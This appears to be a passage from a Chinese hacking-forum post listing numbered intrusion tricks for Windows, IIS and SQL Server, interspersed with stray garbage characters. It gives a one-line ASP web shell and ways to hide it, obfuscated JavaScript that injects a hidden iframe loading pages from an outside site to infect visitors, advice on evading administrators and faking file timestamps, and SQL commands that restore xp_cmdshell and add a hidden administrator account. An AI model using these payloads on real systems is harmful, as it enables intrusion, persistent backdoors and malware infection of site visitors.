52、at "12:17" /interactive cmd7 e9 q/ T: s4 G$ H6 i0 n
执行后可以用AT命令查看新加的任务
6 N( ~. P# v) V6 V9 W' A% r用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。$ [. M. h( l1 \0 b
4 ~( R5 v1 |, R
53、隐藏ASP后门的两种方法
# O% c* ~; T5 m4 [" M: X1 J1、建立非标准目录:mkdir images..\
L- s( q: t2 T& G拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
* L: T$ }" L+ o7 J通过web访问ASP木马:http://ip/images../news.asp?action=login
# j- W, k4 L9 p8 R- i; Y如何删除非标准目录:rmdir images..\ /s
`: t- S" Y& s% U5 D# k4 L1 z P2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
3 n j$ a9 K/ b! u; X0 d! Hmkdir programme.asp
" c; z; s6 S" n& ~) \" ]7 b0 E新建1.txt文件内容:<!--#include file=”12.jpg”-->/ Q) r# s" D$ g! A- V- S1 d
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件 p( E5 r0 Z: X9 M
attrib +H +S programme.asp
0 \) t5 H% r6 J: [通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! ]( D/ L L$ d# u1 X+ {3 I
# D! m# W4 Q6 k3 u
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" _4 U) D7 p$ O2 A
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。) p$ r1 N% F* _1 Q" R; f J
2 ~8 t6 p0 B" }7 V- V! ]1 e55、JS隐蔽挂马8 `1 H3 l& _; e: `. K
1.
/ g! N. |; N; P) T8 ovar tr4c3="<iframe src=ht";. P. `; V0 H0 U) @ h3 d. A3 p
tr4c3 = tr4c3+"tp:/";9 L) ~' P$ \# W
tr4c3 = tr4c3+"/ww";
1 C0 } c' O7 q& ?tr4c3 = tr4c3+"w.tr4";
; Z2 `+ ^0 \1 a+ D4 itr4c3 = tr4c3+"c3.com/inc/m";
, a# z8 g7 u/ S& _ Htr4c3 = tr4c3+"m.htm style="display:none"></i";% ?; E& T& c; n0 D5 H: t
tr4c3 =tr4c3+"frame>'";
$ z, i; T# F% }2 y3 a& \document.write(tr4c3);
1 O' ?6 X" B* C( p7 ?$ h避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
6 c( F# _( v6 T. x' z2 v: C6 R' S0 h2 W& A: v7 d
2." R8 H8 `( ]/ g" v- r' k
转换进制,然后用EVAL执行。如1 \ U. C% w/ c& R& f/ e2 D2 U3 k
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* B2 a! g) K7 S, l& A- O3 Y/ [不过这个有点显眼。1 W& c4 b; [/ s
3.
9 ~! u; o. d) t* jdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
! d( \# R7 z7 l- R; l最后一点,别忘了把文件的时间也修改下。
9 C5 v1 S- B, ?) i2 O1 m$ x
. {" |8 F8 p+ A56.3389终端入侵常用DOS命令4 _: A! {: G$ o. D6 K
taskkill taskkill /PID 1248 /t
$ W" u3 a0 r0 ~9 d# S' A ?) T/ k0 G
, a+ ` A8 `1 K4 jtasklist 查进程
$ x7 m6 B/ Q, A8 |# P9 ^* N7 u h! z9 P
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限% t" h8 J5 h- p* ~" \3 b' k
iisreset /reboot
+ o4 j; G: [( J, e x2 stsshutdn /reboot /delay:1 重起服务器8 }- x& p1 w; E& s) M
3 J: R; o9 q* S$ O
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,) Z! a4 X3 L7 r/ n' ]
6 c- U: o) F; a: b
query user 查看当前终端用户在线情况
' E Y& ]# z9 a( |' b2 q
( C$ C1 c, W% ^; Y b& Z1 K2 x# S% B2 m要显示有关所有会话使用的进程的信息,请键入:query process *
' M) i- ]* G, v: ^' L# j) J
M5 p( |$ {+ O9 O) ]要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
0 ^# F8 `3 T& G( E# u* b6 H/ n- \. ?! C4 K8 g2 T. y
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
" L0 z6 c: l$ C' l0 W! p4 J4 U4 I$ }& S {. B
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
* G$ C. A. V" {1 E+ q! s% S m( E' F d
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
" W j2 t3 W7 c7 q+ T9 n
7 w" {4 |! P* s/ n/ z命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
$ Z4 P G8 D" Y) a V" h2 h# y- J& h5 v! x+ |0 B
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
$ q+ l: _0 h3 k: U% R7 Y
/ M6 Z* ]/ K& p1 a6 F% @% i命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
( h. E X- q" g; |# Z0 g4 v3 [! F2 R5 E# V
56、在地址栏或按Ctrl+O,输入:
- y$ I) C# F! R+ S; x+ ljavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
( b5 l, L% u3 p5 T- V: r- S8 [9 K
6 V% Y8 W: n# n1 ]2 [源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
" P( E5 i4 A" n) C1 K( [
. z1 c( I; u- \+ t0 g5 Z- \57、net user的时候,是不能显示加$的用户,但是如果不处理的话," u9 X3 C! @* a+ Y
用net localgroup administrators是可以看到管理组下,加了$的用户的。5 [* s3 d! u8 A0 j+ G
9 n" B: m. ^: T5 n
58、 sa弱口令相关命令, J0 a% X; v- d
3 h( b/ {* p0 E! X! @" N. }一.更改sa口令方法:
, G+ n& x1 \7 d3 D* }用sql综合利用工具连接后,执行命令:4 S* c& U8 k% |9 }) i# n
exec sp_password NULL,'20001001','sa'
* U- R [3 k: z4 U(提示:慎用!)) M' U. T& r' f/ u7 l
1 v. m9 s- b t! D) u8 }二.简单修补sa弱口令.# Y9 T) v$ W P1 z
: f4 _1 m7 J% w: I
方法1:查询分离器连接后执行:# Y( F- C* n- P1 r& \6 |
if exists (select * from( P0 q) l. Q7 m- S& Y0 v
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
7 q4 B R0 J# l h0 A: HOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
/ Z( ^( R! D, C0 \& c* E! M0 U9 t3 n$ S: W4 {( `3 h* `
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'9 K4 M, V ?5 o) G+ F6 W4 [
1 \) R- n) A# S# L6 ~GO
3 k: L# W4 ?) P% }4 ?! Z
" E s3 f2 b; ^ G7 M然后按F5键命令执行完毕
% L2 x0 j$ a" s B5 f$ f% B C! h
方法2:查询分离器连接后$ _" k& f/ E5 E
第一步执行:use master4 n4 n0 F' V2 e) h
第二步执行:sp_dropextendedproc 'xp_cmdshell'
7 T5 x! t; u4 e* U" ~; \0 E然后按F5键命令执行完毕* w" V* H' d4 |+ ^
" M( l" v4 k9 T6 A
! \9 A( Z9 k# e三.常见情况恢复执行xp_cmdshell.
" t3 \( o7 ^5 F8 S: `5 T, ?2 ?! N' H, e. L! H
: |! L6 o% h4 S) F1 未能找到存储过程'master..xpcmdshell'.
4 }! {, d) [# `* t( c, C( n 恢复方法:查询分离器连接后,& B) F6 C) @3 g9 o9 R* P( `
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int H" n J" ~3 o1 K! t- c) m
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'" p. J+ i+ G( S, }. L# z
然后按F5键命令执行完毕9 o8 i/ a; K$ L# D+ V" Q3 L8 U
: ?. K' x- D! z6 D8 T
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。). `6 t6 ^! Z4 E; p2 I5 A1 `
恢复方法:查询分离器连接后,! W/ |& W; ?, Q0 `7 z
第一步执行:sp_dropextendedproc "xp_cmdshell"3 u! |$ y) L6 \. ~
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ u! ?3 Z) W# W3 I; f' d m8 b然后按F5键命令执行完毕' b. v8 N, B4 g" S- x7 ?7 X( ]
- r$ O4 ]/ D, ^7 y+ i
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
; l& M/ W U7 Q5 B恢复方法:查询分离器连接后,
* C8 r5 ~4 s' M# K+ X6 Z第一步执行:exec sp_dropextendedproc 'xp_cmdshell'9 o- l( |. ~5 ~$ j
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 1 ?, y @: @& E/ n+ s S( `
然后按F5键命令执行完毕% @4 t- r/ b# p% P. D- a; I
e! F7 P7 s+ |* _/ j, D l `) r/ t
四.终极方法.
& V% H& c' h! Y' i: ]如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! ]7 ]" v* ]: B1 X8 G; i
查询分离器连接后,
" ]% I$ |7 o {7 Y2000servser系统:
) }& a$ }+ a, A' Q9 t# S2 O) edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'9 W: m8 s+ ?0 p: d; I2 Y$ P& Z
) S( B3 j# I1 ^! s# G. U( Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# ]) B" m9 L1 q' y" |! \
2 k$ H% Z+ z0 h( X7 l& a, I- {xp或2003server系统:) x" `1 D9 H" z! H5 D
0 @6 Y& d+ y, {, V1 c0 n4 y2 Mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; ^- S1 {/ Z7 \+ j# o
" {( n1 `5 g7 ^) ]. tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 l9 r( U3 c5 g0 n |
发表于 2012-9-15 14:13:15
收藏
支持
反对